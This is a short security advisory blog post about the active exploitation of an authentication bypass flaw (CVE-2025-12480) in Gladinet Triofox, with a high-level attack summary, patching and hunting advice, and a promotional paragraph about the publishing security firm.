14/11/2025

Week 46 – The Antivirus That Opened the Door: Triofox Under Active Attack

10 – 16 Nov 2025

Mandiant has confirmed that threat actors are actively exploiting a critical flaw (CVE-2025-12480) in Triofox by Gladinet — a remote access and file-sharing platform.
The vulnerability allows authentication bypass, letting attackers create admin accounts and execute arbitrary code by abusing the built-in antivirus feature.

This is our new CVE of the Week — a critical flaw with a CVSS score of 9.1.

Once inside, attackers deploy Zoho Assist, AnyDesk, and establish SSH tunnels (port 433) for persistence and lateral movement.
Activity began in August 2025, shortly after patches were released — marking the third Triofox exploit this year.

Why does it matter?

  • Full authentication bypass → instant admin control
  • Security feature (AV) turned into an attack vector
  • Exploitation within weeks of patch release

What should you do now?

  • Patch immediately to version 16.7.10368.56560 or newer.
  • Lock down initial setup/config pages – this was the entry point.
  • Audit admin accounts and AV scanner paths.
  • Hunt for remote access tools (Zoho Assist, AnyDesk, Plink, PuTTY).
  • Monitor for unusual SSH/RDP activity, especially on non-standard ports.

This campaign is a powerful reminder that “trusted” features can become threats if not hardened.
Patching alone isn’t enough — configuration hygiene, privilege control, and active monitoring are equally critical.

You can find the full technical details in the article below.
https://cloud.google.com/blog/topics/threat-intelligence/triofox-vulnerability-cve-2025-12480

White Hat IT Security is a Europe-based Managed Security Services Provider (MSSP) and proud Microsoft Solution Partner. Its Microsoft-verified managed security solutions (MXDR) reflect their deep expertise and commitment to excellence in cybersecurity. The company was awarded the Partner of the Year Hungary Award by Microsoft in 2024.

With the largest incident response capacity in the CEE region, they’re trusted by organizations to deliver fast, effective, and proactive protection. Their portfolio includes penetration testing, vulnerability assessments, managed Cyber Threat Intelligence, as well as Governance, Risk and Compliance (GRC) consulting and specialized security training.

They are committed to supporting professional initiatives that aim to raise cybersecurity awareness and maturity—both for individuals and organizations. They regularly contribute to the community through knowledge sharing, education, and outreach, helping to build a safer digital future for all.

Author:
Filed Under: CVE of the Week
Tags: , , , ,